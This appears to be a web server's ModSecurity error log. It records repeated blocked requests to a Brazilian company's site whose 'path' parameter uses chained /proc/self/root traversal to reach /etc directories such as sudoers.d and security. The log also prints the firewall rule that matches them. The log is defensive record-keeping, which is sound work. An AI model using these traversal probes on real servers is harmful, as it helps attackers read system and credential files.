referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:27.683601 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:36636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzM_u8EFLIOrSqIpt0DQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:29.011344 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:46470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzNQkwaGbbGflqUZCLYgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:30.331058 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:33282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzNhkFeYa1D6dYQnDDywAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:30.757174 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:50690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzNuoXxyEfFpUF8f_lYQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:26:31.633568 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.243.128:33292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzN1_V7PWP6ixUYl6QiwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:35.107964 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:33306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzO1_V7PWP6ixUYl6QlgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:37.492482 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:33200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzPfu8EFLIOrSqIpt0GwAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:26:38.658275 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:33316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzPgbLMZ6AikZjR9UyMgAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:38.799277 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:33232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzPv-YZRR_7pZ7nDJiuAAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:26:42.355631 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:47430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzQgkwaGbbGflqUZCLbwAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:46.277817 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:47442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzRuoXxyEfFpUF8f_lbwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:46.488150 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.241.31:33244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzRv-YZRR_7pZ7nDJivgAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:26:48.679198 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:47450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzSOoXxyEfFpUF8f_ldgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:26:48.843803 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:60094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzSAbLMZ6AikZjR9UyOgAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:27:20.790933 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.241.31:38620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzaF_V7PWP6ixUYl6QuAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:27:41.228148 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:47994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzfRkFeYa1D6dYQnDD-wAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:27:42.233375 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:58344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzfuyqAr6etmhZHNo4xgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:27:44.463333 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:40980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzf8df6f5d65gmYZRIdAAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:27:44.471561 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:56434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzf_u8EFLIOrSqIpt0MwAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:27:45.874639 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:56446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzgcdf6f5d65gmYZRIdgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:27:49.150168 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:40982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzhcdf6f5d65gmYZRIfQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:28:00.336327 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:34726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuzkOoXxyEfFpUF8f_loQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
